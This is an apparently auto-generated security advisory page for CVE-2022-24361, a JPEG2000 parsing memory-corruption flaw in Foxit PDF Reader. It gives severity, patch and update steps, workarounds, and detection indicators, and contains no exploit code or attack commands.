Login Sign Up

CVE-2022-24361

8.8 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability in Foxit PDF Reader allows remote attackers to execute arbitrary code by tricking users into opening malicious PDF files containing specially crafted JPEG2000 images. The flaw exists in improper data validation during JPEG2000 parsing, leading to memory corruption. All users of affected Foxit PDF Reader versions are at risk.

💻 Affected Systems

Products:
  • Foxit PDF Reader
Versions: 11.1.0.52543 and earlier versions
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations are vulnerable. User interaction required (opening malicious PDF).

📦 What is this software?

Pdf Editor by Foxit

View all CVEs affecting Pdf Editor →

Pdf Editor by Foxit

View all CVEs affecting Pdf Editor →

Pdf Reader by Foxit

View all CVEs affecting Pdf Reader →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise through remote code execution with user privileges, potentially leading to data theft, ransomware deployment, or lateral movement within networks.

🟠

Likely Case

Attackers deliver malicious PDFs via phishing emails or compromised websites, executing malware on victim systems when users open the documents.

🟢

If Mitigated

With proper patching and security controls, impact is limited to failed exploitation attempts that may cause application crashes but no code execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: MEDIUM

Exploitation requires user interaction but no authentication. ZDI published advisory with technical details.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.1.1 or later

Vendor Advisory: https://www.foxit.com/support/security-bulletins.html

Restart Required: No

Instructions:

1. Open Foxit PDF Reader. 2. Go to Help > Check for Updates. 3. Follow prompts to install latest version. 4. Alternatively, download and install from Foxit website.

🔧 Temporary Workarounds

Disable JPEG2000 image rendering

windows

Prevent Foxit from processing JPEG2000 images which are rarely used in PDFs

Not applicable - configuration change only

Use alternative PDF reader

all

Temporarily switch to a different PDF reader while patching

🧯 If You Can't Patch

  • Restrict user permissions to limit potential damage from code execution
  • Implement application whitelisting to prevent unauthorized executables from running

🔍 How to Verify

Check if Vulnerable:

Check Foxit PDF Reader version in Help > About. If version is 11.1.0.52543 or earlier, system is vulnerable.

Check Version:

Not applicable - check via GUI in Help > About

Verify Fix Applied:

Verify version is 11.1.1 or later in Help > About. Test with known safe PDF containing JPEG2000 images.

📡 Detection & Monitoring

Log Indicators:

  • Application crashes of Foxit Reader
  • Unusual process creation from Foxit Reader

Network Indicators:

  • Downloads of PDF files from suspicious sources
  • Outbound connections from Foxit Reader process

SIEM Query:

Process Creation where Parent Process Name contains 'FoxitReader.exe' AND Command Line contains unusual parameters

📊 Metadata

CVE ID: CVE-2022-24361
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-787
Published: February 18, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-24361, you might also want to check these:

CVE-2022-43604 10.0

CVE-2022-43604 is a critical out-of-bounds write vulnerability in the OpENer EtherNet/IP stack that ...

Same vulnerability type (CWE-787)
CVE-2025-24201 10.0

This critical vulnerability allows malicious web content to break out of the Web Content sandbox via...

Same vulnerability type (CWE-787)
CVE-2020-14871 10.0

This is a critical buffer overflow vulnerability (CWE-787) in Oracle Solaris's Pluggable Authenticat...

Same vulnerability type (CWE-787)